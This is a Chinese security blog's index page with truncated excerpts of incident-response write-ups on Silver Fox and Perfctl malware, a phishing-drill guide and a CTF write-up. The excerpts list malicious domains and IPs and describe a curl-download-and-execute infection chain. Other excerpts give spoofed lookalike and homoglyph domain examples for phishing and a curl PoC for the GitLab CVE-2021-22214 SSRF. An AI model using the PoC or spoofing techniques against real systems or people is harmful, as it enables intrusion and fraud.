分类网安下的文章 - 赛博保安日志

双见银狐，是它，是它，就是它！

双见银狐，是它，是它，就是它！银狐大哥又来新样本了！一、事件发现天眼监测发现有两个IP存在普通远控木马活动事件，多次请求解析多个恶意域名：time.googledns.io time.micrsofthost.com time.wkossclsaleklddeff.is time.secssl.com使用 DNSLookupView 看一下外连：发现 svchost.exe 一直在外连，查看浏览器记录，发现 2月11日下午15:38分访问了仿冒的搜狗浏览器：经过测试，该仿冒网址下载的样本为：Hfauibfolwrold.exe根据杀软识别到的记录可以找到：第一个为权限维持目录中的文件，第二个为落地木马删除后回收站的路径，第三个为压缩包解压时存放的temp文件，随机先将第二个和第三个木马删除。找到该目录发现目录不存在，推测为attrib命令设置了隐藏属性（现在银狐很喜欢这个啊），使用命令将其显示：里面有权限维持使用的文件：这里可以看到 libexpat.dll 的创建时间与下载仿冒搜狗浏览器的时间吻合：检测为恶意，为 DLL反射加载类型。二、木马二次利用木马在潜藏了两天后，于 2月13日

应急响应 · 03-09 · 50 人浏览

又见银狐

近期银狐木马有些猖獗。。。仿冒网站感觉更多了，隔段时间就会有一次告警。发现天眼告警：直接 todesk 上机排查：DNSLookupView 看一下外连：发现是 C:\Windows\System32\ipconfig.exe 一直在外连，直接拖下来，看是不是被替换掉了：好的，这个文件暂时没异常，应该是被劫持调用的。直接命令查看一下情况：目前进程 PID 是 16284，父进程 PID 是 16184，但在查的时候没有 PID 为 16184 的进程，父进程再启动后关闭了：这时候先终止 ipconfig.exe 的进程，随后不再外连，等待一会后也没有外联，随机将电脑重新启动，外联又开始了，这是可以排查启动项了，直接在任务管理器的启动任务里面找到了：展开后可以看到：就是他了，禁止他的启动，并且找到根目录：删除后重新启动，这次没有外联了。经过查询告警 IOC 域名和 IP，发现近期样本为 WPS：果然在下载目录找到了 1 月 29 日下载的银狐木马：在浏览器历史记录里面找到了下载地址：IOC：dashenbaba3.com27.124.10.18zh.wps-offce.cn样本：99aa

应急响应 · 03-03 · 52 人浏览

Perfctl 进程排查记录

根据前辈所讲：🔹 4.1 木马概况中招后，会中 rootkit，会做权限维持，会自身隐藏等中招后，没有重启过的机器，清除需杀掉所有中招后再启动的进程中招后，重启过的机器，在清除后，需要立马重启需要下载 busybox 来做清除目前看到的行为是植入各种流量代理，用于挂机赚收益🔹 4.2 木马开始阶段大多为暴力破解，成功后开始：检查当前系统是否是 x86_64 架构，如果不是则退出脚本。如果 /tmp 目录不存在，创建该目录并将权限设置为 777（即允许所有用户读、写和执行）。检查 /tmp 是否挂载了 noexec 选项（即不允许执行），如果是，重新挂载 /tmp 使其可以执行。移除 /tmp、/etc/cron 和 /etc/ld.so.preload 文件的不可更改属性。在 /tmp 下创建隐藏的目录 .perf.c 和 .xdia，这些可能是恶意脚本或工具的存放位置。通过 curl 下载一个文件（ordens.php）到 /tmp/httphxx。再通过 curl 将文件下载到 /tmp/httpd 目录中。最后执行。🔹 4.3 木马行为释放文件权限维持：a. 伪造自身为系统

应急响应 · 2025-08-26 · 38 人浏览

一次Windows的应急响应

发现天眼告警直接 tdesk 上机排查：1、木马情况：如果你用火绒处理掉这个，病毒还会再次启动，并且会在 C:\Windows\System32\ 目录下面挑选几个进程进行劫持外连：形如：sihost.exeRuntimeBroker.exetaskhostw.exe使用 ProcessExplorer 查了半天，没发现什么有用信息。通过对比正常电脑上面三个进程的线程，我感觉还是这个 dll 有点问题：ntdll.dll，但没什么证据，暂且不表。2、确认木马最初告警时间：7月22日早8点桌面有个异常快捷方式，一看，好家伙：C hrome（是的，有一个空格）。打开目标位置，和告警日期符合。再打开浏览器的下载页面，确认为仿冒的谷歌浏览器： https://xxxxx.com/file/ChromeCore_1344_6.1.7.6.exe?auth_key=xxxxx（没有可用的 auth_key 的话是下载不下来的）可以看到这里是木马大本营了。同时，也发现了 C:\Windows\System32\ 下面有很多恶意的 bat：打开一个，可以看到恶意内容：启

应急响应 · 2025-08-19 · 37 人浏览

钓鱼攻击防御指南：演练与实战技巧

一、自我介绍ID：易水哲 z3nbyte二、课程目录钓鱼的前期准备Gophish的基本使用钓鱼邮件的拟定钓鱼方式的多样化一些注意事项企业钓鱼真实案例分享三、钓鱼的前期准备1、域名核心思路：根据钓鱼目标场景，选择具有诱导性或混淆性的域名，提升点击率与伪装效果。（1）目标导向型注册根据攻击目标的使用场景注册相关域名，比如仿冒电商、银行、门户网站等：示例域名：taoba0.com（数字“0”替代字母“o”）icbc-pay.com（增加业务词“pay”）cctv.com.co（增加国家顶级域，伪装为子站）icbc.com.abc.com（多级子域名，伪造成正规结构）具体示例： https://www.blilbill.com/video/BV1Pm4y1s8dZ/（2）IDN 域名混淆与 Punycode 编码机制利用国际化域名（IDN）注册含有非拉丁字符的域名，可以伪造成与真实域名外观极度相似的变体。例如使用西里尔字母“о”替代拉丁字母“o”。示例说明：正常域名伪造域名说明google.comgооgle.com两个“o”用的是西里尔字母taobao.comtаоbао.com多个字母被

生命在于学习·网安 · 2025-06-30 · 1315 人浏览

2025年Solar应急响应公益月赛-3月-部分WP

【签到】和黑客去 Battle 把！随便聊一聊就吐出密钥了，直接提交： flag{H7Q44S85842W6TQZPERS72ED} 窃密排查 - 1连接服务器，进入 /tmp，发现程序，攻击者使用了 megacmd 直接查找 mega 相关文件：find / -name "*mega*" -o -name "*MEGA*" 2>/dev/null查看 megacmdserver.log 日志，查找关键字：cat ~/.megaCmd/megacmdserver.log* 2>/dev/null | grep -i "login\|user\|flag"flag: flag{25solar3abc@habenwir.com}溯源排查 - 1下载下来是一个 raw 镜像，直接使用 WSL 挂载并修改 root 密码：sudo mkdir /mnt/rootfs sudo mount -o loop,offset=$((512 * 2048)) disk.raw /mnt/rootfs sudo chroot /

文章·生命在于学习·网安 · 2025-03-29 · 397 人浏览

Mac mini(M4) 上搭建渗透测试环境的全过程

在 Mac Mini 上搭建渗透测试环境前言最近我趁着国补换了台新设备，直接入手了一台 Mac Mini（M4）。虽然之前一直用 ROG，但考虑到 macOS 也有不少渗透测试工具可以用，索性试试看能不能搭建一套顺手的环境。这里就记录一下整个搭建过程，给以后自己参考，也顺便分享给有需要的人。1. 基本系统配置1.1 开发者模式与基础工具装好 macOS 后，第一步肯定是先搞定基础开发环境。# 安装 Xcode 命令行工具 xcode-select --install然后是 Homebrew，macOS 上必备的软件包管理器：/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"装好 Homebrew 之后，先更新一下：brew update && brew upgrade1.2 iTerm2 和 Oh My ZshmacOS 自带的 Terminal 也能用，但 iTerm2 体验更好，所以直接装：brew inst

生命在于折腾·网安 · 2025-02-12 · 2595 人浏览

关于CSDN账号注销的说明

如果有经常看我网站的朋友（大概没有）发现我的CSDN账号去年注销了，下面是注销时候的一些数据：注销的原因大家估计也能明白，这里面的数据大多是假数据，可以看看下面这些人机评论：甚至我也能发现其他博主提到过，曾经发出的免费文章竟然没CSDN设置成收费了。我感觉这样的环境不利于个人成长，也不利于圈内的朋友们相互交流学习，我发文章的目的仅仅是为了IT届尽一些微薄之力，因为在过去的生涯中，很多不经意地方的某一句话，解决了困扰我的问题。

说说·网安 · 2025-01-29 · 272 人浏览

CVE-2021-22214记录

一、前言我现在在某央企驻场，渗透测试工程师，也负责漏洞管理平台，也就是监测、渗透测试出现的漏洞，都会录入平台，走流程整改复测办结。二、漏洞详情1、漏洞简介GitLab存在前台未授权SSRF漏洞，未授权的攻击者也可以利用该漏洞执行SSRF攻击（CVE-2021-22214）。该漏洞源于对用户提供数据的验证不足，远程攻击者可通过发送特殊构造的 HTTP 请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。2、漏洞POC（1）命令行验证curl -s --show-error -H 'Content-Type: application/json' https://example.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://xx.xxx.xx.xx:port/api/v1/targets?test.yml"}'（2）burp发送包

生命在于研究·网安 · 2023-12-18 · 1119 人浏览

TV电视盒子渗透测试抓包设置

一、前言封面图是示例图，因为涉及到保密，所以本次测试的电视盒子不放出外观和设置界面。这一次要测试电视盒子，大家也都知道，市面上的电视盒子大部分都是Android，当然，要使用笔记本去抓电视盒子的数据包，也是一样的方法，加证书，设置代理。但电视盒子都有权限的，一般不开放的，所以要联系厂商获得授权。二、步骤1、取得adb的授权为了电视盒子的安全性，厂商都会把adb关闭的，要开启也可以，但必须使用厂商的注册机，通过获取直接的机器码，发送给厂商，获得许可证，才可以开启adb，所以如果自己没有授权去做渗透测试的话，拒绝！！！未经授权的渗透测试都是违法的！！！2、设置处于同一网络将电视盒子和笔记本连接至同一WiFi，此处电视盒子的IP假设为172.21.150.161。我本机的IP为172.21.150.162：3、测试连接我上一篇文章提到过macos安装adb，如果没有adb的话参考上一篇文章安装adb。命令：adb connect 172.21.150.161如果连接成功，会回显成功或者无回显。4、导出Burp证书5、将证书转换为pem格式这里要使用openssl工具，我的macos自带，没有

文章·生命在于学习·信息安全学习·网安 · 2023-12-13 · 756 人浏览